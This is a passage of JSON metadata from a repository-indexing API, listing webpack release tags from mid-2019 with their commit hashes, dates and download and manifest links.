ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webp